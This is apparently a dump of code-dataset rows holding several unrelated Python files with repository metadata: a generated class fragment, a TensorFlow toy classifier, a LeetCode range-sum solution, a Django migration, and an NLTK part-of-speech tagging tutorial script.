prop.isAdmin = True
prop.defaultValue = False
prop.defaultValueStr = "no"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("temporaryError", prop)
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
| [
"[email protected]"
] | |
97208d08e04cecb91c78591585387c2390b581fd | 90333a3140dc20036ad1ae88aaeec4b72a93914b | /tensorflow/example04.py | 8c309c32db68466a1c8c20d8d572042450f9d5a6 | [] | no_license | jw0831/AI-Study | 1f026acbc46a5f133921efc3c07d233ec1e8e284 | 02a2bd7469691facc5b6b283aa5edb8e90841456 | refs/heads/master | 2023-05-12T13:05:55.499517 | 2021-06-13T14:32:19 | 2021-06-13T14:32:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,679 | py | #(4) example04
#import tensorflow and numpy
import tensorflow as tf
import numpy as np
#[feather, wing]
x_data = np.array(
[[0, 0], [1, 0], [1, 1], [0, 0], [0, 0], [0, 1]])
#[etc, mammal, bird]
#one-hot encoding(label)
y_data = np.array([
[1, 0, 0], #etc
[0, 1, 0], #mammal
[0, 0, 1], #bird
[1, 0, 0],
[1, 0, 0],
[0, 0, 1]
])
#make simple model
#make placeholder
X = tf.placeholder(tf.float32)
Y = tf.placeholder(tf.float32)
#input size is 2, output size is 3
weight1 = tf.Variable(tf.random_uniform([2, 10], -1., 1.))
weight2 = tf.Variable(tf.random_uniform([10, 3], -1., 1.))
bias1 = tf.Variable(tf.zeros([10]))
bias2 = tf.Variable(tf.zeros([3]))
#hidden layer with ReLU activation
layer1 = tf.add(tf.matmul(X, weight1), bias1)
layer2 = tf.nn.relu(layer1)
#feed the ReLU-activated hidden layer (layer2, not the pre-activation layer1) into the output layer
model = tf.add(tf.matmul(layer2, weight2), bias2)
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(labels=Y, logits=model))
optimizer = tf.train.AdamOptimizer(learning_rate=0.01)
train_op = optimizer.minimize(cost)
#training
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
for step in range(100):
sess.run(train_op, feed_dict={X: x_data, Y: y_data})
if (step + 1) % 10 == 0:
print(step + 1, sess.run(cost, feed_dict={X: x_data, Y: y_data}))
prediction = tf.argmax(model, 1)
ground_truth = tf.argmax(Y, 1)
print('Prediction:', sess.run(prediction, feed_dict={X: x_data}))
print('Ground Truth:', sess.run(ground_truth, feed_dict={Y: y_data}))
is_correct = tf.equal(prediction, ground_truth)
accuracy = tf.reduce_mean(tf.cast(is_correct, tf.float32))
print('Accuracy: %.2f' % sess.run(accuracy * 100, feed_dict={X: x_data, Y: y_data})) | [
"[email protected]"
] | |
daf6a6648337c20c1e3b7fc6492df080328c9231 | 32e55bf28b9f22265bcbc1d8c0ebf52a3608187d | /303. Range Sum Query - Immutable.py | 0c4562b35da42903720903add0d94136f25c38aa | [] | no_license | Garacc/LeetCode | 9f843672a18701d032f36769c9025761199d8caf | 215d12703b2cac4c1ad49d5a0e1060948fbbacd2 | refs/heads/master | 2018-10-10T03:37:48.889898 | 2018-09-17T08:38:22 | 2018-09-17T08:38:22 | 120,304,202 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 939 | py | class NumArray:
'''
def __init__(self, nums):
"""
:type nums: List[int]
"""
self.nums = nums
def sumRange(self, i, j):
"""
:type i: int
:type j: int
:rtype: int
"""
ans = 0
for idx in range(i, j + 1):
ans += self.nums[idx]
return ans
TLE
'''
def __init__(self, nums):
"""
:type nums: List[int]
"""
self.nums = nums
        self.sums = nums[:]  # copy so building the prefix sums does not mutate the caller's list
for i in range(1, len(nums)):
self.sums[i] += self.sums[i - 1]
def sumRange(self, i, j):
"""
:type i: int
:type j: int
:rtype: int
"""
if i == 0:
return self.sums[j]
else:
return self.sums[j] - self.sums[i - 1]
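# Hedged worked example (added for illustration): with nums = [-2, 0, 3, -5, 2, -1]
# the running prefix sums become [-2, -2, 1, -4, -2, -3], so
#   sumRange(0, 2) = sums[2] = 1
#   sumRange(2, 5) = sums[5] - sums[1] = -3 - (-2) = -1
#   sumRange(0, 5) = sums[5] = -3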
# Your NumArray object will be instantiated and called as such:
# obj = NumArray(nums)
# param_1 = obj.sumRange(i,j) | [
"[email protected]"
] | |
8c567d804437e17644ed5f3c11c0cd3e47b52c03 | 56b63ee537f872af0fc028016d1508b4c1dd5c60 | /school/migrations/0284_auto_20210507_1155.py | e0f316d5d0463336216b57b0e361ecb8d4b458c7 | [] | no_license | jacknjillsolutionsrevanth/EMS1 | 01fc571120f765b0fbfe3aa654b15ff578d6e9b9 | db14d8e6c15669b5938aa9276c5e22006218814a | refs/heads/main | 2023-08-03T19:40:50.073133 | 2021-10-01T07:02:37 | 2021-10-01T07:02:37 | 410,202,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,734 | py | # Generated by Django 3.1.2 on 2021-05-07 06:25
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('school', '0283_auto_20210430_1342'),
]
operations = [
migrations.AddField(
model_name='rpt_consolidatedreport',
name='branch',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AddField(
model_name='rpt_consolidatedreport',
name='centername',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AddField(
model_name='rpt_consolidatedreport',
name='net',
field=models.FloatField(blank=True, default=0.0, null=True),
),
migrations.AddField(
model_name='rpt_consolidatedreport',
name='routename',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AddField(
model_name='rpt_consolidatedreport',
name='tsrate',
field=models.FloatField(default=0.0),
),
migrations.AlterField(
model_name='rpt_consolidatedreport',
name='centercode',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AlterField(
model_name='rpt_excel_bankwise',
name='amount',
field=models.FloatField(blank=True, default=0.0, null=True),
),
migrations.AlterField(
model_name='rpt_excel_bankwise',
name='total',
field=models.FloatField(blank=True, default=0.0, null=True),
),
]
| [
"[email protected]"
] | |
384210d95788ab27a35cabd3c957edf150bc29d4 | b4134236292aff9dc7dc7ae0f54ad46bae791ccf | /PythonNLP/C05.py | d594e50cab7154f30f8e7f0d448fac78bd25c658 | [] | no_license | dandanloveJM/NLTK-Python-CN | ac0567da4d517d8e03c2921a4998dd1843cf26b3 | d0036f25baca18003ddf3d5790cd9a8d76d0345e | refs/heads/master | 2020-08-17T11:32:05.991795 | 2019-10-17T14:21:59 | 2019-10-17T14:21:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,044 | py | # Ch5 分类和标注词汇
# Part-of-speech tagging (POS tagging), or simply "tagging":
# classifying words according to their part of speech (POS) and labelling them accordingly.
# Parts of speech are also known as word classes or lexical categories.
# The collection of tags used for a particular task is known as a tagset.
import nltk
import pylab
from nltk import word_tokenize
from nltk.corpus import brown
brown_words = brown.words(categories='news')
brown_tagged_words = brown.tagged_words(categories='news')
brown_sents = brown.sents(categories='news')
brown_tagged_sents = brown.tagged_sents(categories='news')
# Sec 5.1 Using a part-of-speech tagger
text = word_tokenize("And now for something completely different")
nltk.pos_tag(text)
nltk.help.upenn_tagset('CC')
nltk.help.upenn_tagset('RB')
nltk.help.upenn_tagset('IN')
nltk.help.upenn_tagset('NN')
nltk.help.upenn_tagset('JJ')
nltk.corpus.brown.readme()
print(nltk.corpus.gutenberg.readme())
# Handling homonyms: the tagger labels them correctly --
# the first "refUSE" is a verb and the second "REFuse" is a noun;
# the first "permit" is a verb and the second "permit" is a noun.
text = word_tokenize("They refuse to permit us to obtain the refuse permit")
text = word_tokenize("They refuse to permit us to obtain the beautiful book")
nltk.pos_tag(text)
# Find contexts of the form w1 w w2, then find all words w' that occur in the same context, i.e. w1 w' w2.
# This is used to find distributionally similar words, since they appear in the same contexts.
text = nltk.Text(word.lower() for word in nltk.corpus.brown.words())
text.similar('word')
text.similar('woman')
text.similar('bought')
text.similar('over')
text.similar('the')
# Sec 5.2 Tagged corpora
# str2tuple() converts an already-tagged string into a (word, tag) tuple
taggen_token = nltk.tag.str2tuple('fly/NN')
taggen_token
taggen_token[0]
taggen_token[1]
sent = '''
The/AT grand/JJ jury/NN commented/VBD on/IN a/AT number/NN of/IN
other/AP topics/NNS ,/, AMONG/IN them/PPO the/AT Atlanta/NP and/CC
Fulton/NP-tl County/NN-tl purchasing/VBG departments/NNS which/WDT it/PPS
said/VBD ``/`` ARE/BER well/QL operated/VBN and/CC follow/VB generally/RB
accepted/VBN practices/NNS which/WDT inure/VB to/IN the/AT best/JJT
interest/NN of/IN both/ABX governments/NNS ''/'' ./.
'''
sent.split()
[nltk.tag.str2tuple(t) for t in sent.split()]
# Reading tagged corpora
# Opening the file ca01 of the Brown corpus shows content like the following:
# The/at Fulton/np-tl County/nn-tl Grand/jj-tl Jury/nn-tl said/vbd Friday/nr an/at
# investigation/nn of/in Atlanta's/np$ recent/jj primary/nn election/nn produced/vbd
# ``/`` no/at evidence/nn ''/'' that/cs any/dti irregularities/nns took/vbd place/nn ./.
# This corpus is already tagged, so it can be read directly with the tagged_words() function
nltk.corpus.brown.tagged_words()
nltk.corpus.brown.tagged_words(tagset='universal')  # tag the words using the universal tagset
nltk.corpus.treebank.tagged_words()
nltk.corpus.treebank.tagged_words(tagset='universal')
nltk.corpus.nps_chat.tagged_words()
nltk.corpus.nps_chat.tagged_words(tagset='universal')
nltk.corpus.conll2000.tagged_words()
nltk.corpus.conll2000.tagged_words(tagset='universal')
# TODO: none of the following convert properly to the universal tagset
nltk.corpus.sinica_treebank.tagged_words()
nltk.corpus.sinica_treebank.tagged_words(tagset='universal')
nltk.corpus.indian.tagged_words()
nltk.corpus.indian.tagged_words(tagset='universal')
nltk.corpus.mac_morpho.tagged_words()
nltk.corpus.mac_morpho.tagged_words(tagset='universal')
nltk.corpus.cess_cat.tagged_words()
nltk.corpus.cess_cat.tagged_words(tagset='universal')
# tagged_sents() divides the corpus into sentences (rather than one flat list of words), with each word POS-tagged.
# This matters because automatic taggers are trained and tested on lists of sentences, not on lists of words.
nltk.corpus.brown.tagged_sents()[0]
nltk.corpus.brown.tagged_sents(tagset='universal')[0]
# 2.3 A Universal Part-of-Speech Tagset, a universal (simplified) tagset
# http://www.nltk.org/book/ch05.html Table 2.1 (even simpler than Table 5-1 on p. 200 of the book)
# Tag Meaning English Examples
# ADJ adjective new, good, high, special, big, local
# ADP adposition on, of, at, with, by, into, under
# ADV adverb really, already, still, early, now
# CONJ conjunction and, or, but, if, while, although
# DET determiner, article the, a, some, most, every, no, which
# NOUN noun year, home, costs, time, Africa
# NUM numeral twenty-four, fourth, 1991, 14:24
# PRT particle at, on, out, over per, that, up, with
# PRON pronoun he, their, her, its, my, I, us
# VERB verb is, say, told, given, playing, would
# . punctuation marks . , ; !
# X other ersatz, esprit, dunno, gr8, univeristy
from nltk.corpus import brown
brown_news_tagged = brown.tagged_words(categories='news', tagset='universal')
tag_fd = nltk.FreqDist(tag for (word, tag) in brown_news_tagged)
print(list(tag_fd))
tag_fd.keys()
tag_fd.most_common()
tag_fd.tabulate()
tag_fd.plot(cumulative=True)
# Graphical POS-concordance tool; it can search for any combination of words and POS tags,
# e.g. "VERB VERB", "was missing", "had VERB", "DET money", and so on.
nltk.app.concordance()
# 2.4 Nouns: generally refer to people, places, things and concepts. Nouns may appear after
#     determiners and adjectives, and can be the subject or object of a verb.
# Table 5-2: syntactic patterns involving nouns
# For bigrams (W1, W2) where W2 is tagged NOUN, compute the distribution of the POS of W1
brown_news_tagged = brown.tagged_words(categories='news', tagset='universal')
word_tag_pairs = nltk.bigrams(brown_news_tagged)  # build the list of bigrams
noun_preceders = [a[1] for (a, b) in word_tag_pairs if b[1] == 'NOUN']
fdist = nltk.FreqDist(noun_preceders)
fdist.most_common()
[tag for (tag, _) in fdist.most_common()]
fdist.plot(cumulative=True)
# Conclusion: nouns occur after determiners and adjectives, including numeral adjectives (numerals, tagged NUM)
# 2.5 Verbs: words that describe events and actions. In a sentence, a verb typically expresses
#     a relation involving the referents of one or more noun phrases.
# Table 5-3: syntactic patterns involving verbs
# Find the most common verbs in news text (the items counted in the frequency distribution are word-tag pairs)
# wsj = nltk.corpus.treebank.tagged_words(simplify_tags=True)  # simplify_tags is no longer supported
wsj = nltk.corpus.treebank.tagged_words(tagset='universal')
word_tag_fd = nltk.FreqDist(wsj)
word_tag_fd.most_common(20)
word_tag_fd.tabulate()
[wt[0] for (wt, _) in word_tag_fd.most_common() if wt[1] == 'VERB'][:20]
list(word_tag_fd)[:20]
fdist = nltk.FreqDist(word_tag_fd)
fdist.most_common(12)
fdist.tabulate()
# fdist.plot(cumulative=True)  # do not run this: it hangs because there are far too many verb types
wsj = nltk.corpus.treebank.tagged_words(tagset='universal')
word_tag_pairs = nltk.bigrams(wsj)
verb_preceders = [a[1] for (a, b) in word_tag_pairs if b[1] == 'VERB']
fdist = nltk.FreqDist(verb_preceders)
fdist.most_common()
fdist.tabulate()
fdist.plot(cumulative=True)
# Conclusion: verbs occur after verbs, nouns and adverbs.
# Since words and tags are paired, we can treat the word as the condition and the tag as the event,
# and initialize a conditional frequency distribution from the list of condition-event pairs.
wsj = nltk.corpus.treebank.tagged_words(tagset='universal')
cfd1 = nltk.ConditionalFreqDist(wsj)
cfd1['yield'].most_common(20)
cfd1['cut'].most_common(20)
cfd1.tabulate()
list(cfd1)[:20]
# We can also reverse the pairs, using the tag as the condition and the word as the event; the resulting distribution lets us look up directly which words carry a given tag.
wsj = nltk.corpus.treebank.tagged_words()
cfd2 = nltk.ConditionalFreqDist((tag, word) for (word, tag) in wsj)
cfd2['VBN']
cfd2['VBN'].keys()
list(cfd2['VBN'])[:20]
list(cfd2['VBN'].keys())[:20]
cfd2['VBN'].most_common(20)
'been' in cfd2['VBN'].keys()
# Try to distinguish VBD (past tense) from VBN (past participle).
# First find words that can be both VBD and VBN, then examine the surrounding context of each use.
wsj = nltk.corpus.treebank.tagged_words()
cfd3 = nltk.ConditionalFreqDist(wsj)
# cfd1.conditions() returns the list of all conditions, equivalent to list(cfd1.keys()) returning all the keys.
[w for w in cfd3.conditions() if 'VBD' in cfd3[w] and 'VBN' in cfd3[w]]
cfd3['kicked']
idx1 = wsj.index(('kicked', 'VBD'))
idx2 = wsj.index(('kicked', 'VBN'))
' '.join(word for word, tag in wsj[idx1 - 10:idx1 + 10])
' '.join(word for word, tag in wsj[idx2 - 10:idx2 + 10])
# Other word classes (adjectives, adverbs, prepositions, articles/determiners, modal verbs, personal pronouns)
# Adjectives: modify nouns; they can act as modifiers or as predicates.
# Adverbs: modify verbs, specifying the time, manner, place or direction of the event the verb describes; they can also modify adjectives.
# P204 2.7 Unsimplified tags
# Ex5-1 Program to find the most frequent noun tags
def findtags(tag_prefix, tagged_text):
cfd = nltk.ConditionalFreqDist((tag, word) for (word, tag) in tagged_text if tag.startswith(tag_prefix))
return dict((tag, cfd[tag].most_common(5)) for tag in cfd.conditions())
tagdict = findtags('NN', nltk.corpus.brown.tagged_words(categories='news'))
for tag in sorted(tagdict):
print(tag, tagdict[tag])
# 2.8. Exploring tagged corpora
# Look at the words that follow "often"
brown_learned_text = nltk.corpus.brown.words(categories='learned')
sorted(set(b for (a, b) in nltk.bigrams(brown_learned_text) if a == 'often'))
brown_learned_tagged = nltk.corpus.brown.tagged_words(categories='learned', tagset='universal')
brown_learned_bigrams = nltk.bigrams(brown_learned_tagged)
[(a, b) for (a, b) in brown_learned_bigrams]
brown_learned_bigrams = nltk.bigrams(brown_learned_tagged)
list(brown_learned_bigrams)
brown_learned_bigrams = nltk.bigrams(brown_learned_tagged)
tags = [b[1] for (a, b) in nltk.bigrams(brown_learned_tagged) if a[0] == 'often']
fd = nltk.FreqDist(tags)
fd.tabulate()
fd.plot(cumulative=True)
# P205 Ex5-2 Using POS tags to find three-word phrases of the form <Verb> to <Verb>
from nltk.corpus import brown
def process(sentence):
for (w1, t1), (w2, t2), (w3, t3) in nltk.trigrams(sentence):
if t1.startswith('V') and t2 == 'TO' and t3.startswith('V'):
print(w1, w2, w3)
for tagged_sent in nltk.corpus.brown.tagged_sents():
if len(tagged_sent) >= 3:
process(tagged_sent)
brown_news_tagged = brown.tagged_words(categories='news')
brown_news_tagged = brown.tagged_words(categories='news', tagset='universal')
data = nltk.ConditionalFreqDist((word.lower(), tag) for (word, tag) in brown_news_tagged)
for word in sorted(data.conditions()):
if len(data[word]) > 3:
tags = [tag for (tag, _) in data[word].most_common()]
print(word, ' '.join(tags))
data['works']
data['$1']
data['$222']
data.tabulate()
data.conditions()
data.values()
nltk.app.concordance()
# P206 3 Mapping words to properties using Python dictionaries
# The Python dictionary type (also called an associative array or hash map); learn how to use
# dictionaries to represent different kinds of linguistic information, including parts of speech.
# 3.1 Indexed lists vs. dictionaries
# 3.2. Dictionaries in Python
pos = {}
pos['colorless'] = 'ADJ'
pos['ideas'] = 'N'
pos['sleep'] = 'V'
pos['furiously'] = 'ADV'
pos['colorless']
pos
# Accessing a key that does not exist
pos['green']
# Converting the dictionary to a list
list(pos)
# Sorting the dictionary keys
sorted(pos)
# Iterating over the dictionary in order
[w for w in pos if w.endswith('s')]
for word in sorted(pos):
print(word + ":", pos[word])
pos.keys()  # the keys
pos.values()  # the values
pos.items()  # the (key, value) pairs
for key, val in sorted(pos.items()):
print(key + ":", val)
# Keys in a dictionary must be unique
pos['sleep'] = 'V'
pos['sleep']
pos['sleep'] = 'N'
pos['sleep']
# 3.3. Defining dictionaries (two ways to create a dictionary)
pos = {'colorless': 'ADJ', 'ideas': 'N', 'sleep': 'V', 'furiously': 'ADV'}
pos = dict(colorless='ADJ', ideas='N', sleep='V', furiously='ADV')
# 3.4. Default dictionaries (the default value used when a new key is created)
from collections import defaultdict
frequency = defaultdict(int)  # the default value can be an immutable object
frequency['colorless'] = 4
frequency['colorless']
frequency['ideas']  # accessing a missing key creates it automatically with the default value
list(frequency.items())
pos = defaultdict(list)  # the default value can also be a mutable object
pos['sleep'] = ['NOUN', 'VERB']
pos['sleep']
pos['ideas']
list(pos.items())
class myObject():
def __init__(self, data=0):
self._data = data
return
oneObject = myObject(5)
oneObject._data
twoObject = myObject()
twoObject._data
pos = defaultdict(myObject)
pos['sleep'] = myObject(5)
pos['ideas']
list(pos.items())
pos['sleep']._data
pos['ideas']._data
# A lambda expression as the default factory
pos = defaultdict(lambda: 'NOUN')
pos['colorless'] = 'ADJ'
pos['colorless']
pos['blog']
list(pos.items())
# Replace low-frequency words with the UNK (out-of-vocabulary) token
alice = nltk.corpus.gutenberg.words('carroll-alice.txt')
vocab = nltk.FreqDist(alice)
v1000 = [word for (word, _) in vocab.most_common(1000)]
mapping = defaultdict(lambda: 'UNK')
for v in v1000:
mapping[v] = v
list(mapping.items())
alice2 = [mapping[v] for v in alice]
alice2[:100]
# 3.5. Incrementally updating a dictionary
# Ex5-3 Incrementally updating a dictionary, sorting by value
counts = nltk.defaultdict(int)
for (word, tag) in nltk.corpus.brown.tagged_words(categories='news', tagset='universal'):
counts[tag] += 1
counts['NOUN']
sorted(counts)
counts
from operator import itemgetter
sorted(counts.items(), key=itemgetter(0), reverse=False)
sorted(counts.items(), key=itemgetter(1), reverse=False)
sorted(counts.items(), key=itemgetter(1), reverse=True)
sorted(counts.items(), key=itemgetter(2), reverse=False) # IndexError: tuple index out of range
[t for t, c in sorted(counts.items(), key=itemgetter(1), reverse=True)]
pair = ('NP', 8336)
pair
pair[1]
itemgetter(1)(pair)
itemgetter(0)(pair)
# Index words by their last two letters
last_letters = defaultdict(list)
words = nltk.corpus.words.words('en')
for word in words:
key = word[-2:]
last_letters[key].append(word)
last_letters['ly']
last_letters['xy']
# Index words by their anagram key (anagrams: words formed by rearranging the same letters)
anagrams = defaultdict(list)
for word in words:
key = ''.join(sorted(word))
anagrams[key].append(word)
anagrams['aeilnrt']
anagrams['kloo']
anagrams['Zahity']
anagrams[''.join(sorted('love'))]
# NLTK provides a more convenient way of creating a defaultdict(list):
# nltk.Index() is a wrapper around defaultdict(list), and
# nltk.FreqDist() is essentially a defaultdict(int) (with extra support for sorting and plotting)
anagrams = nltk.Index((''.join(sorted(w)), w) for w in words)
anagrams['aeilnrt']
anagrams = nltk.FreqDist(''.join(sorted(w)) for w in words)
anagrams.most_common(20)
# 3.6. Complex keys and values
# A default dictionary with complex keys and values
pos = defaultdict(lambda: defaultdict(int))
brown_news_tagged = nltk.corpus.brown.tagged_words(categories='news', tagset='universal')
for ((w1, t1), (w2, t2)) in nltk.bigrams(brown_news_tagged):
pos[(t1, w2)][t2] += 1
pos[('DET', 'right')]
pos[('NOUN', 'further')]
pos[('PRT', 'book')]
# 3.7. Inverting a dictionary
# Looking up a value by key is fast, but looking up a key by value is slow; to speed this up
# we can build a second dictionary that maps values back to keys.
counts = defaultdict(int)
for word in nltk.corpus.gutenberg.words('milton-paradise.txt'):
counts[word] += 1
# One way of looking up keys by value
[key for (key, value) in counts.items() if value == 32]
# pos maps keys to values; pos2 maps values back to keys
pos = {'colorless': 'ADJ', 'ideas': 'N', 'sleep': 'V', 'furiously': 'ADV'}
pos2 = dict((value, key) for (key, value) in pos.items())
pos2['N']
# The simple inversion above does not work when one value is shared by several keys; below is a way to build a value-to-keys dictionary in that case
pos.update({'cats': 'N', 'scratch': 'V', 'peacefully': 'ADV', 'old': 'ADJ'})
pos2 = defaultdict(list)
for key, value in pos.items():
pos2[value].append(key)
pos2['ADV']
# Use nltk.Index() to build the new value-to-keys dictionary
pos2 = nltk.Index((value, key) for (key, value) in pos.items())
pos2['ADV']
# 4. Automatic tagging (adding part-of-speech tags to text automatically in different ways)
from nltk.corpus import brown
brown_tagged_sents = brown.tagged_sents(categories='news')
brown_sents = brown.sents(categories='news')
brown_tagged_words = brown.tagged_words(categories='news')
brown_words = brown.words(categories='news')
# 4.1. The default tagger
# Find the most frequent tag in the news category of the Brown corpus
tags = [tag for (word, tag) in brown.tagged_words(categories='news')]
nltk.FreqDist(tags).max()
# 'NN' is the most frequent tag, so use it as the default tag
raw = 'I do not like green eggs and ham, I do not like them Sam I am!'
tokens = nltk.word_tokenize(raw)
default_tagger = nltk.DefaultTagger('NN')
default_tagger.tag(tokens)
default_tagger.evaluate(brown_tagged_sents)  # evaluate the accuracy of the default tagger
# 4.2. The regular-expression tagger
patterns = [
(r'.*ing$', 'VBG'), # gerunds
(r'.*ed$', 'VBD'), # simple past
(r'.*es$', 'VBZ'), # 3rd singular present
(r'.*ould$', 'MD'), # modals
(r'.*\'s$', 'NN$'), # possessive nouns
(r'.*s$', 'NNS'), # plural nouns
(r'(a|an)', 'AT'),
(r'^-?[0-9]+(.[0-9]+)?$', 'CD'), # cardinal numbers
(r'.*', 'NN') # nouns (default)
]
regexp_tagger = nltk.RegexpTagger(patterns)
regexp_tagger.tag(brown_sents[3])  # the text to be tagged
regexp_tagger.evaluate(brown_tagged_sents)  # brown_tagged_sents is the test set
# 4.3. The lookup tagger
# Find the 100 most frequent words, store their most likely tag, and use this information as the model of a "lookup tagger"
fd = nltk.FreqDist(brown_words)
cfd = nltk.ConditionalFreqDist(brown_tagged_words)
most_freq_words = fd.most_common(100)
likely_tags = dict((word, cfd[word].max()) for (word, _) in most_freq_words)
cfd['the']
# The unigram model: the most frequent tag of each word in the corpus forms the basis of the model
baseline_tagger = nltk.UnigramTagger(model=likely_tags)
baseline_tagger.evaluate(brown_tagged_sents)
sent = brown_sents[3]
baseline_tagger.tag(sent)
# Words that the unigram model cannot tag are handled by the default tagger; this process is called "backoff".
baseline_tagger = nltk.UnigramTagger(model=likely_tags, backoff=nltk.DefaultTagger('NN'))
baseline_tagger.evaluate(brown_tagged_sents)
# Ex5-4 Evaluating the performance of the lookup tagger
def performance(cfd, wordlist):
lt = dict((word, cfd[word].max()) for word in wordlist)
baseline_tagger = nltk.UnigramTagger(model=lt, backoff=nltk.DefaultTagger('NN'))
return baseline_tagger.evaluate(brown_tagged_sents)
def display():
word_freqs = nltk.FreqDist(brown_words).most_common()
words_by_freq = [w for (w, _) in word_freqs]
cfd = nltk.ConditionalFreqDist(brown_tagged_words)
sizes = 2 ** pylab.arange(15)
    # effect of model (vocabulary) size on performance
perfs = [performance(cfd, words_by_freq[:size]) for size in sizes]
pylab.plot(sizes, perfs, '-bo')
pylab.title('Lookup Tagger Performance with Varying Model Size')
pylab.xlabel('Model Size')
pylab.ylabel('Performance')
pylab.show()
display()
# 5. N-gram tagging
# The *Tagger() classes can only be trained on (lists of tagged) sentences
# 5.1 The unigram tagger: the most frequent tag of each word in the corpus forms the basis of the unigram model
# Evaluate the unigram tagger on its own training data
unigram_tagger = nltk.UnigramTagger(brown_tagged_sents)
unigram_tagger.tag(brown_sents[2007])
unigram_tagger.evaluate(brown_tagged_sents)
# 5.2 Splitting the data into a training set and a test set
# Train the unigram tagger on the training data and evaluate it on the test data
size = int(len(brown_tagged_sents) * 0.9)
train_sents = brown_tagged_sents[:size]
test_sents = brown_tagged_sents[size:]
unigram_tagger = nltk.UnigramTagger(train_sents)
unigram_tagger.evaluate(test_sents)
# 5.3 More general N-gram taggers
# The bigram tagger
bigram_tagger = nltk.BigramTagger(train_sents)
bigram_tagger.tag(brown_sents[2007])  # tag data from the training set
bigram_tagger.tag(brown_sents[4203])  # tag data from the test set
bigram_tagger.evaluate(test_sents)  # overall accuracy is very low because of the data sparsity problem
# 5.4 Combining taggers -- is the result worse, and why?
t0 = nltk.DefaultTagger('NN')
t1 = nltk.UnigramTagger(train_sents, backoff=t0)
t1.evaluate(test_sents)
t2 = nltk.BigramTagger(train_sents, backoff=t1)
t2.evaluate(test_sents)  # this one performs best
t3 = nltk.TrigramTagger(train_sents, backoff=t2)
t3.evaluate(test_sents)
t2 = nltk.BigramTagger(train_sents, cutoff=1, backoff=t1)
t2.evaluate(test_sents)
# With cutoff=15 the accuracy is still high, which suggests that the context alone does not really reveal the underlying regularities of word tagging
t3 = nltk.TrigramTagger(train_sents, cutoff=15, backoff=t2)
t3.evaluate(test_sents)
# 5.5 Tagging unknown words
# For unseen words we can back off to the regular-expression tagger or the default tagger, but neither can exploit context (a short UNK-based sketch follows).
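# A small sketch (not in the original text) of one way to help the n-gram taggers
# with unknown words: map every out-of-vocabulary token to 'UNK' before training,
# reusing the UNK-mapping idea from section 3.4 above, so that 'UNK' gets tagged
# from its contexts like any other word.
unk_vocab = nltk.FreqDist(brown_words)
unk_known = set(w for (w, _) in unk_vocab.most_common(1000))
unk_map = defaultdict(lambda: 'UNK')
for w in unk_known:
    unk_map[w] = w
unk_train = [[(unk_map[w], t) for (w, t) in sent] for sent in train_sents]
unk_test = [[(unk_map[w], t) for (w, t) in sent] for sent in test_sents]
u1 = nltk.UnigramTagger(unk_train, backoff=nltk.DefaultTagger('NN'))
u2 = nltk.BigramTagger(unk_train, backoff=u1)
u2.evaluate(unk_test)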
# 5.6 Storing taggers
from pickle import dump, load
output = open('t2.pkl', 'wb')
dump(t2, output, -1)
output.close()
input = open('t2.pkl', 'rb')
t2_bak = load(input)
input.close()
text = """The board's action shows what free enterprise
is up against in our complex maze of regulatory laws ."""
tokens = text.split()
t2.tag(tokens)
t2_bak.tag(tokens)
t2.evaluate(test_sents)
t2_bak.evaluate(test_sents)
# 5.7. The performance boundary (upper bound) of N-gram taggers
# One approach is to count how many words are ambiguous in context; roughly 1 in 20 words may be ambiguous
# cfd cannot be built directly over all sentences because some sentences have fewer than 3 words, which breaks the trigrams() call
cfd = nltk.ConditionalFreqDist(
((x[1], y[1], z[0]), z[1])
for sent in brown_tagged_sents if len(sent)>=3
for x, y, z in nltk.trigrams(sent) )
ambiguous_contexts = [c for c in cfd.conditions() if len(cfd[c]) > 1]
sum(cfd[c].N() for c in ambiguous_contexts) / cfd.N()
# 'Colquitt' is from the offending sentence, which can be found in the ca01 text file
for sent in brown_tagged_sents[:100]:
print(sent,len(sent))
if len(sent)>=3:
for x, y, z in nltk.trigrams(sent):
print(x[0], y[0], z[0], x[1], y[1], z[1])
# Another approach is to study the words that get tagged incorrectly
# ToDo: but the printed confusion matrix is hardly readable, is it?
test_tags = [tag for sent in brown.sents(categories='editorial') for (word, tag) in t2.tag(sent)]
gold_tags = [tag for (word, tag) in brown.tagged_words(categories='editorial')]
print(nltk.ConfusionMatrix(gold_tags, test_tags))
# Tagging across sentence boundaries
# With a trigram tagger, tagging across a sentence boundary would use the last word of the previous sentence + the punctuation + the first word of the current sentence
# But words in different sentences are unrelated, so the tagger should be trained, run and evaluated on lists of tagged sentences
# Ex5-5 Sentence-level N-gram tagging
# The combined tagger built above is already trained on sentence lists, so it already respects sentence boundaries
# 6. Transformation-based tagging
# Problems with n-gram taggers:
# 1) Table size (the language model): the trigram table becomes a huge sparse matrix
# 2) Context: the only information an n-gram tagger takes from the context is the tags; it ignores the words themselves.
# This section uses Brill tagging, an inductive tagging method with good performance whose model is only a small fraction of an n-gram tagger's.
# Brill tagging is transformation-based learning: guess every word's tag, then go back and correct the wrong tags, progressively fixing the whole document.
# Like n-gram tagging it is supervised, but instead of counting observations it only compiles a list of transformation (correction) rules.
# Brill tagging relies on the principle that rules are linguistically interpretable, so it can learn rules from data and only needs to store the rules.
# An n-gram tagger only memorises the regularities implicitly, never abstracting them into rules, and therefore stores a huge table.
# Template of a Brill transformation rule: replace T1 with T2 in context C.
# Each rule is scored by its net benefit = number of incorrect tags fixed - number of correct tags broken
# (a small training sketch follows the demo below)
from nltk.tbl import demo as brill_demo
brill_demo.demo()
print(open('errors.out').read())
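# A hedged sketch (assumes NLTK 3's brill / brill_trainer API) of actually training
# a Brill tagger on top of the n-gram backoff chain built in section 5.4;
# t2, train_sents and test_sents are reused from above.
from nltk.tag import brill, brill_trainer
brill_templates = brill.fntbl37()  # the standard rule templates shipped with NLTK
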